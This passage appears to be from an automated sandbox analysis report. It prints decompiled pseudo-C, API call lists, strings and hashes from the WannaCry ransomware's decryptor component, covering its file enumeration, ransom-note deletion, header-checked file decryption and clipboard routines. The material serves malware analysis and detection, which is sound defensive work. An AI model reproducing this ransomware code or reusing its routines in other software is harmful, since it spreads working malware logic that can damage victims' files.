                                                      										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
                                                      										_t236 = _t236 + 8;
                                                      										if(_t146 != 0) {
                                                      											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
                                                      											_t236 = _t236 + 8;
                                                      											if(_t147 != 0) {
                                                      												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
                                                      												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                                      												_t149 = wcslen(_t236 + 0x5c);
                                                      												_t236 = _t236 + 4;
                                                      												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
                                                      												 *((char*)(_t236 + 0x590)) = 3;
                                                      												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
                                                      												 *((char*)(_t236 + 0x584)) = 1;
                                                      												_push(1);
                                                      												goto L14;
                                                      											}
                                                      										}
                                                      									}
                                                      								} else {
                                                      									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
                                                      										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
                                                      										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                                      										_t154 = wcslen(_t236 + 0x5c);
                                                      										_t236 = _t236 + 4;
                                                      										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
                                                      										 *((char*)(_t236 + 0x590)) = 2;
                                                      										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
                                                      										 *((char*)(_t236 + 0x584)) = 1;
                                                      										_push(1);
                                                      										L14:
                                                      										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
                                                      							continue;
                                                      						}
                                                      						break;
                                                      					}
                                                      					FindClose( *(_t236 + 0x20));
                                                      					_t115 =  *(_t236 + 0x18);
                                                      					_t225 =  *_t115;
                                                      					if(_t225 != _t115) {
                                                      						while(1) {
                                                      							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
                                                      							if(_t135 != 0 &&  *_t135 != 0) {
                                                      								goto L22;
                                                      							}
                                                      							_t136 =  *((intOrPtr*)(_t225 + 0xc));
                                                      							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
                                                      								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                                      							}
                                                      							E00402560(_t232, _t136);
                                                      							_t225 =  *_t225;
                                                      							if(_t225 !=  *(_t236 + 0x18)) {
                                                      								continue;
                                                      							}
                                                      							goto L22;
                                                      						}
                                                      					}
                                                      					L22:
                                                      					_t116 =  *((intOrPtr*)(_t236 + 0x28));
                                                      					_t226 =  *_t116;
                                                      					if(_t226 != _t116) {
                                                      						while(1) {
                                                      							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
                                                      							if(_t131 != 0 &&  *_t131 != 0) {
                                                      								goto L28;
                                                      							}
                                                      							_t132 =  *((intOrPtr*)(_t226 + 0xc));
                                                      							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
                                                      								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                                      							}
                                                      							E004026B0(_t232, _t132);
                                                      							_t226 =  *_t226;
                                                      							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
                                                      								continue;
                                                      							}
                                                      							goto L28;
                                                      						}
                                                      					}
                                                      					L28:
                                                      					_t227 =  *(_t236 + 0x58c);
                                                      					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
                                                      					_t237 = _t236 + 0x10;
                                                      					DeleteFileW(_t237 + 0x5c);
                                                      					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
                                                      					_t238 = _t237 + 0x10;
                                                      					DeleteFileW(_t238 + 0x5c);
                                                      					_t123 =  *((intOrPtr*)(_t238 + 0x18));
                                                      					 *((char*)(_t238 + 0x584)) = 0;
                                                      					_t221 = _t123;
                                                      					_t228 =  *_t123;
                                                      					if(_t228 != _t123) {
                                                      						do {
                                                      							_t129 = _t228;
                                                      							_t228 =  *_t228;
                                                      							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
                                                      						} while (_t228 != _t221);
                                                      						_t123 =  *((intOrPtr*)(_t238 + 0x18));
                                                      					}
                                                      					_push(_t123);
                                                      					L00412C98();
                                                      					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
                                                      					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
                                                      					 *((intOrPtr*)(_t238 + 0x20)) = 0;
                                                      					_t239 = _t238 + 4;
                                                      					_t124 =  *_t229;
                                                      					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
                                                      					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
                                                      					if(_t124 != _t229) {
                                                      						do {
                                                      							_push(0);
                                                      							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
                                                      						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
                                                      					}
                                                      					_push( *((intOrPtr*)(_t239 + 0x28)));
                                                      					L00412C98();
                                                      					_t240 = _t239 + 4;
                                                      					_t125 = 1;
                                                      				} else {
                                                      					 *((char*)(_t236 + 0x57c)) = 0;
                                                      					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
                                                      					_push( *((intOrPtr*)(_t236 + 0x10)));
                                                      					L00412C98();
                                                      					_t242 = _t236 + 4;
                                                      					 *((intOrPtr*)(_t242 + 0x10)) = 0;
                                                      					 *((intOrPtr*)(_t242 + 0x14)) = 0;
                                                      					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
                                                      					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
                                                      					_push( *((intOrPtr*)(_t242 + 0x20)));
                                                      					L00412C98();
                                                      					_t240 = _t242 + 4;
                                                      					_t125 = 0;
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
                                                      				return _t125;
                                                      			}


                                                      APIs
                                                        • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                                      • swprintf.MSVCRT ref: 00402728
                                                      • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
                                                      • #825.MFC42(?,?,?,?), ref: 0040276F
                                                        • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                                      • #825.MFC42(?), ref: 004027A5
                                                      • wcscmp.MSVCRT ref: 004027E1
                                                      • wcscmp.MSVCRT ref: 004027FB
                                                      • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00402830
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
                                                      • wcslen.MSVCRT ref: 0040286E
                                                      • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0040296A
                                                      • FindClose.KERNEL32(?), ref: 0040297D
                                                        • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
                                                      • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                                      • API String ID: 1037557366-268640142
                                                      • Opcode ID: 68c0da3c818e992a567790c9a9b65803973eb8845537bfb51ade59474b63f593
                                                      • Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
                                                      • Opcode Fuzzy Hash: 68c0da3c818e992a567790c9a9b65803973eb8845537bfb51ade59474b63f593
                                                      • Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 73%
                                                      			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                      				struct _OVERLAPPED* _v8;
                                                      				char _v20;
                                                      				long _v32;
                                                      				long _v36;
                                                      				union _LARGE_INTEGER* _v40;
                                                      				void _v44;
                                                      				char _v48;
                                                      				char _v560;
                                                      				struct _OVERLAPPED* _v564;
                                                      				union _LARGE_INTEGER* _v568;
                                                      				void _v572;
                                                      				char _v573;
                                                      				short _v575;
                                                      				intOrPtr _v579;
                                                      				void _v580;
                                                      				struct _FILETIME _v588;
                                                      				struct _FILETIME _v596;
                                                      				struct _FILETIME _v604;
                                                      				void* _v608;
                                                      				void _v612;
                                                      				void _v616;
                                                      				void* _v620;
                                                      				intOrPtr _v624;
                                                      				void* __ebx;
                                                      				void* __ebp;
                                                      				int _t109;
                                                      				int _t113;
                                                      				int _t115;
                                                      				int _t116;
                                                      				int _t118;
                                                      				void* _t119;
                                                      				signed int _t122;
                                                      				signed int _t137;
                                                      				signed int _t139;
                                                      				int _t140;
                                                      				signed int _t141;
                                                      				int _t145;
                                                      				signed int _t148;
                                                      				int _t152;
                                                      				int _t155;
                                                      				void* _t159;
                                                      				intOrPtr _t196;
                                                      				signed int _t212;
                                                      				signed int _t213;
                                                      				void* _t216;
                                                      				intOrPtr _t223;
                                                      				signed int _t224;
                                                      				void* _t226;
                                                      				intOrPtr _t227;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x4158c8);
                                                      				_push(0x413050);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t227;
                                                      				_push(_t212);
                                                      				_v624 = __ecx;
                                                      				_t213 = _t212 | 0xffffffff;
                                                      				_v620 = _t213;
                                                      				_v608 = _t213;
                                                      				_v48 = 0;
                                                      				_v616 = 0;
                                                      				_v580 = 0;
                                                      				_v579 = 0;
                                                      				_v575 = 0;
                                                      				_v573 = 0;
                                                      				_v612 = 0;
                                                      				_v36 = 0;
                                                      				_v32 = 0;
                                                      				_v564 = 0;
                                                      				_v8 = 0;
                                                      				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
                                                      				_v620 = _t159;
                                                      				if(_t159 != _t213) {
                                                      					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
                                                      					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
                                                      					__eflags = _t109;
                                                      					if(_t109 == 0) {
                                                      						L32:
                                                      						_push(0xffffffff);
                                                      						_push( &_v20);
                                                      						goto L33;
                                                      					} else {
                                                      						__eflags = 0;
                                                      						asm("repe cmpsd");
                                                      						if(0 != 0) {
                                                      							goto L32;
                                                      						} else {
                                                      							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
                                                      							__eflags = _t113;
                                                      							if(_t113 == 0) {
                                                      								goto L32;
                                                      							} else {
                                                      								__eflags = _v616 - 0x100;
                                                      								if(_v616 != 0x100) {
                                                      									goto L32;
                                                      								} else {
                                                      									_t223 = _v624;
                                                      									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
                                                      									__eflags = _t115;
                                                      									if(_t115 == 0) {
                                                      										goto L32;
                                                      									} else {
                                                      										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
                                                      										__eflags = _t116;
                                                      										if(_t116 == 0) {
                                                      											goto L32;
                                                      										} else {
                                                      											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
                                                      											__eflags = _t118;
                                                      											if(_t118 == 0) {
                                                      												goto L32;
                                                      											} else {
                                                      												__eflags = _v612 - 3;
                                                      												if(_v612 != 3) {
                                                      													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
                                                      													_t216 = _t119;
                                                      													_v608 = _t216;
                                                      													__eflags = _t216 - 0xffffffff;
                                                      													if(_t216 != 0xffffffff) {
                                                      														_push( &_v48);
                                                      														_push( &_v560);
                                                      														_t51 = _t223 + 4; // 0x4
                                                      														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
                                                      														__eflags = _t122;
                                                      														if(_t122 != 0) {
                                                      															L22:
                                                      															_t59 = _t223 + 0x54; // 0x54
                                                      															_push(0x10);
                                                      															_push(_v48);
                                                      															_t196 =  *0x4213b0; // 0x4218b0
                                                      															_push(_t196);
                                                      															_push( &_v560);
                                                      															E0040A150(_t59);
                                                      															_v44 = _v572;
                                                      															_v40 = _v568;
                                                      															while(1) {
                                                      																__eflags = _v40;
                                                      																if(__eflags < 0) {
                                                      																	break;
                                                      																}
                                                      																if(__eflags > 0) {
                                                      																	L26:
                                                      																	_t139 =  *(_t223 + 0x4d0);
                                                      																	__eflags = _t139;
                                                      																	if(_t139 == 0) {
                                                      																		L28:
                                                      																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
                                                      																		__eflags = _t140;
                                                      																		if(_t140 == 0) {
                                                      																			L34:
                                                      																			_push(0xffffffff);
                                                      																			_push( &_v20);
                                                      																			goto L33;
                                                      																		} else {
                                                      																			_t141 = _v36;
                                                      																			__eflags = _t141;
                                                      																			if(_t141 == 0) {
                                                      																				goto L34;
                                                      																			} else {
                                                      																				_v44 = _v44 - _t141;
                                                      																				asm("sbb dword [ebp-0x24], 0x0");
                                                      																				_t76 = _t223 + 0x54; // 0x54
                                                      																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
                                                      																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
                                                      																				__eflags = _t145;
                                                      																				if(_t145 == 0) {
                                                      																					goto L32;
                                                      																				} else {
                                                      																					__eflags = _v32 - _v36;
                                                      																					if(_v32 == _v36) {
                                                      																						continue;
                                                      																					} else {
                                                      																						goto L32;
                                                      																					}
                                                      																				}
                                                      																			}
                                                      																		}
                                                      																	} else {
                                                      																		__eflags =  *_t139;
                                                      																		if( *_t139 != 0) {
                                                      																			goto L32;
                                                      																		} else {
                                                      																			goto L28;
                                                      																		}
                                                      																	}
                                                      																} else {
                                                      																	__eflags = _v44;
                                                      																	if(_v44 <= 0) {
                                                      																		break;
                                                      																	} else {
                                                      																		goto L26;
                                                      																	}
                                                      																}
                                                      																goto L41;
                                                      															}
                                                      															_push(0);
                                                      															SetFilePointerEx(_t216, _v572, _v568, 0);
                                                      															SetEndOfFile(_t216);
                                                      															goto L36;
                                                      														} else {
                                                      															_push( &_v48);
                                                      															_push( &_v560);
                                                      															_t56 = _t223 + 0x2c; // 0x2c
                                                      															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
                                                      															__eflags = _t148;
                                                      															if(_t148 != 0) {
                                                      																_v564 = 1;
                                                      																goto L22;
                                                      															} else {
                                                      																goto L20;
                                                      															}
                                                      														}
                                                      													} else {
                                                      														_push(_t119);
                                                      														_push( &_v20);
                                                      														goto L33;
                                                      													}
                                                      												} else {
                                                      													CloseHandle(_t159);
                                                      													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
                                                      													_v620 = _t159;
                                                      													__eflags = _t159 - 0xffffffff;
                                                      													if(_t159 == 0xffffffff) {
                                                      														goto L32;
                                                      													} else {
                                                      														SetFilePointer(_t159, 0xffff0000, 0, 2);
                                                      														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
                                                      														__eflags = _t152;
                                                      														if(_t152 == 0) {
                                                      															goto L32;
                                                      														} else {
                                                      															__eflags = _v36 - 0x10000;
                                                      															if(_v36 != 0x10000) {
                                                      																goto L32;
                                                      															} else {
                                                      																SetFilePointer(_t159, 0, 0, 0);
                                                      																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
                                                      																__eflags = _t155;
                                                      																if(_t155 == 0) {
                                                      																	L20:
                                                      																	_push(0xffffffff);
                                                      																	_push( &_v20);
                                                      																	goto L33;
                                                      																} else {
                                                      																	__eflags = _v32 - 0x10000;
                                                      																	if(_v32 != 0x10000) {
                                                      																		goto L20;
                                                      																	} else {
                                                      																		SetFilePointer(_t159, 0xffff0000, 0, 2);
                                                      																		SetEndOfFile(_t159);
                                                      																		_t216 = _v608;
                                                      																		L36:
                                                      																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
                                                      																		__eflags = _v612 - 3;
                                                      																		if(_v612 == 3) {
                                                      																			_t137 = CloseHandle(_t159) | 0xffffffff;
                                                      																			__eflags = _t137;
                                                      																			_v608 = _t137;
                                                      																			_v620 = _t137;
                                                      																			MoveFileW(_a4, _a8);
                                                      																		}
                                                      																		_t224 =  *(_t223 + 0x4d4);
                                                      																		__eflags = _t224;
                                                      																		if(_t224 != 0) {
                                                      																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
                                                      																		}
                                                      																		_push(0xffffffff);
                                                      																		_push( &_v20);
                                                      																		L00413056();
                                                      																		 *[fs:0x0] = _v20;
                                                      																		return 1;
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_push(_t213);
                                                      					_push( &_v20);
                                                      					L33:
                                                      					L00413056();
                                                      					 *[fs:0x0] = _v20;
                                                      					return 0;
                                                      				}
                                                      				L41:
                                                      			}




















































                                                      0x004022ce
                                                      0x004022d5
                                                      0x00000000
                                                      0x004022db
                                                      0x004022e5
                                                      0x004022e8
                                                      0x004022ee
                                                      0x00402497
                                                      0x004024ad
                                                      0x004024b3
                                                      0x004024ba
                                                      0x004024c3
                                                      0x004024c3
                                                      0x004024c6
                                                      0x004024cc
                                                      0x004024da
                                                      0x004024da
                                                      0x004024e0
                                                      0x004024e6
                                                      0x004024e8
                                                      0x00402509
                                                      0x00402509
                                                      0x0040250b
                                                      0x00402510
                                                      0x00402511
                                                      0x00402521
                                                      0x0040252e
                                                      0x0040252e
                                                      0x004022d5
                                                      0x004022c8
                                                      0x0040229e
                                                      0x00402291
                                                      0x0040225e
                                                      0x0040222d
                                                      0x00402220
                                                      0x00402202
                                                      0x004021e4
                                                      0x004021bd
                                                      0x004021ad
                                                      0x00402190
                                                      0x00402139
                                                      0x00402139
                                                      0x0040213d
                                                      0x00402452
                                                      0x00402452
                                                      0x0040245f
                                                      0x0040246c
                                                      0x0040246c
                                                      0x00000000

                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
                                                      • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
                                                      • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
                                                      • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
                                                      • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
                                                      • CloseHandle.KERNEL32(00000000), ref: 00402234
                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
                                                      • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
                                                      • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
                                                      • _local_unwind2.MSVCRT ref: 00402452
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
                                                      • String ID: WANACRY!
                                                      • API String ID: 1586634678-1240840912
                                                      • Opcode ID: 99468a7adf92e140f18bc92f45e5389bbb3b22b5213984f8d8d7e9952fbc0adf
                                                      • Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
                                                      • Opcode Fuzzy Hash: 99468a7adf92e140f18bc92f45e5389bbb3b22b5213984f8d8d7e9952fbc0adf
                                                      • Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E004035A0(intOrPtr __ecx) {
                                                      				int _t51;
                                                      				void* _t54;
                                                      				long _t55;
                                                      				signed int _t64;
                                                      				signed int _t68;
                                                      				void* _t71;
                                                      				int _t78;
                                                      				short _t86;
                                                      				signed int _t92;
                                                      				intOrPtr _t110;
                                                      				int _t121;
                                                      				void* _t122;
                                                      				void* _t123;
                                                      				void* _t126;
                                                      				void* _t128;
                                                      				intOrPtr _t129;
                                                      				void* _t130;
                                                      				void* _t132;
                                                      				void* _t134;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041365C);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t129;
                                                      				_t130 = _t129 - 0x2e4;
                                                      				_t110 = __ecx;
                                                      				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
                                                      				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
                                                      				if(_t51 != 0) {
                                                      					_t51 = OpenClipboard( *(_t110 + 0x20));
                                                      					if(_t51 != 0) {
                                                      						_t121 = 0;
                                                      						_t126 = 0;
                                                      						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
                                                      							do {
                                                      								_push(0);
                                                      								_t71 = _t130 + 0x18;
                                                      								_push(_t121);
                                                      								_push(_t71);
                                                      								L00412D7C();
                                                      								_push(0x4206e0);
                                                      								_push(_t71);
                                                      								_push(_t130 + 0x14);
                                                      								 *(_t130 + 0x308) = 0;
                                                      								L00412CCE();
                                                      								 *(_t130 + 0x2fc) = 2;
                                                      								L00412CC2();
                                                      								 *(_t130 + 0x2fc) = 0xffffffff;
                                                      								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
                                                      								L00412CC2();
                                                      								_t121 = _t121 + 1;
                                                      							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
                                                      						}
                                                      						_t122 = GlobalAlloc(2, _t126 + 2);
                                                      						 *(_t130 + 0x14) = _t122;
                                                      						if(_t122 != 0) {
                                                      							_t54 = GlobalLock(_t122);
                                                      							 *(_t130 + 0x10) = _t54;
                                                      							if(_t54 != 0) {
                                                      								_t78 = 0;
                                                      								_t128 = 0;
                                                      								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
                                                      								if(_t55 > 0) {
                                                      									while(1) {
                                                      										_push(0);
                                                      										_push(_t78);
                                                      										_push(_t130 + 0x24);
                                                      										L00412D7C();
                                                      										_push(0x4206e0);
                                                      										_push(_t55);
                                                      										 *((intOrPtr*)(_t130 + 0x304)) = 3;
                                                      										_push(_t130 + 0x24);
                                                      										L00412CCE();
                                                      										 *(_t130 + 0x2fc) = 5;
                                                      										L00412CC2();
                                                      										_t86 =  *0x42179c; // 0x0
                                                      										 *(_t130 + 0x24) = _t86;
                                                      										memset(_t130 + 0x26, 0, 0xb3 << 2);
                                                      										_t132 = _t130 + 0xc;
                                                      										asm("stosw");
                                                      										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
                                                      										_t64 = wcslen(_t132 + 0x24);
                                                      										_t123 = _t132 + 0x28;
                                                      										_t92 = _t64 << 1 >> 2;
                                                      										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
                                                      										_t134 = _t132 + 0x18;
                                                      										_t68 = wcslen(_t134 + 0x28);
                                                      										_t130 = _t134 + 8;
                                                      										_t128 = _t128 + _t68 * 2;
                                                      										 *(_t130 + 0x2fc) = 0xffffffff;
                                                      										L00412CC2();
                                                      										_t78 = _t78 + 1;
                                                      										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
                                                      										if(_t78 >= _t55) {
                                                      											break;
                                                      										}
                                                      										_t110 =  *((intOrPtr*)(_t130 + 0x18));
                                                      									}
                                                      									_t122 =  *(_t130 + 0x14);
                                                      								}
                                                      								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
                                                      								GlobalUnlock(_t122);
                                                      								EmptyClipboard();
                                                      								SetClipboardData(0xd, _t122);
                                                      							} else {
                                                      								GlobalFree(_t122);
                                                      							}
                                                      						}
                                                      						_t51 = CloseClipboard();
                                                      					}
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
                                                      				return _t51;
                                                      			}

                                                      APIs
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
                                                      • OpenClipboard.USER32(?), ref: 004035E9
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
                                                      • #3301.MFC42(?,00000000,00000000), ref: 0040361A
                                                      • #924.MFC42 ref: 00403635
                                                      • #800.MFC42 ref: 00403646
                                                      • #800.MFC42 ref: 00403665
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
                                                      • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
                                                      • GlobalLock.KERNEL32(00000000), ref: 0040369C
                                                      • GlobalFree.KERNEL32(00000000), ref: 004036AB
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
                                                      • #3301.MFC42(?,00000000,00000000), ref: 004036E7
                                                      • #924.MFC42(00000000), ref: 00403702
                                                      • #800.MFC42(00000000), ref: 00403713
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
                                                      • wcslen.MSVCRT ref: 00403753
                                                      • wcslen.MSVCRT ref: 0040377B
                                                      • #800.MFC42 ref: 00403797
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
                                                      • EmptyClipboard.USER32 ref: 004037D4
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
                                                      • CloseClipboard.USER32 ref: 004037E3
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
